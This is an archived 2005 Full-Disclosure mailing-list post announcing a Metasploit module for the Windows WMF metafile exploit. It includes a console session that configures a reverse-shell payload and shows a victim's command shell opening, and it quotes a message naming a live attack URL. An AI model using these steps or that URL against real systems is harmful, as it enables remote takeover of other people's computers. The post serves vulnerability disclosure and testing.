Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:10827
HistoryDec 28, 2005 - 12:00 a.m.

[Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-2800:00:00
vulners.com
16

In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps…

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

  • – --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[] Starting Reverse Handler.
[
] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[
] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

On Tuesday 27 December 2005 14:20, [email protected] wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/